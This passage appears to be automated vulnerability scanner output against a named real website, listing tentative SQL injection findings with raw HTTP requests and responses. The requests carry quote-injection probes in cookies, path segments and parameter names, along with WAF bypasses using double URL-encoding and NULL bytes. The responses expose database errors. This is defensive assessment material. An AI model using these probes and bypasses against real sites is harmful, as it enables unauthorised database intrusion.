Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:57 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527%2527
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.19. http://www.analyticspros.com/blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937'; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:44:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/100-google-analytics-training-toronto-emetrics-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937''; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:44:57 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:45:00 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:45:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22044


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.20. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/103-google-analytics-opt-out-feature.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics%2527/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:54:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics%2527%2527/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:54:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:54:30 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:54:30 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.21. http://www.analyticspros.com/blog/55-googleanalytics/103-google-analytics-opt-out-feature.html [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/103-google-analytics-opt-out-feature.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:41:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/103-google-analytics-opt-out-feature.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141%2527%2527; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:41:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.22. http://www.analyticspros.com/blog/55-googleanalytics/106-google-analytics-health-check.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/106-google-analytics-health-check.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics'/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:03:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics''/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:03:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:03:31 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:03:31 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.23. http://www.analyticspros.com/blog/55-googleanalytics/106-google-analytics-health-check.html [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/106-google-analytics-health-check.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:53:02 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:53:02 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26145


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.24. http://www.analyticspros.com/blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html?itemid=70#comment&1%00'=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:01:52 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/109-google-analytics-training-san-jose-2010.html?itemid=70#comment&1%00''=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:01:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:01:54 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:01:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.25. http://www.analyticspros.com/blog/55-googleanalytics/113-domain-hostname-content-reports.html [ki_u cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/113-domain-hostname-content-reports.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/113-domain-hostname-content-reports.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:57:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/113-domain-hostname-content-reports.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:57:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
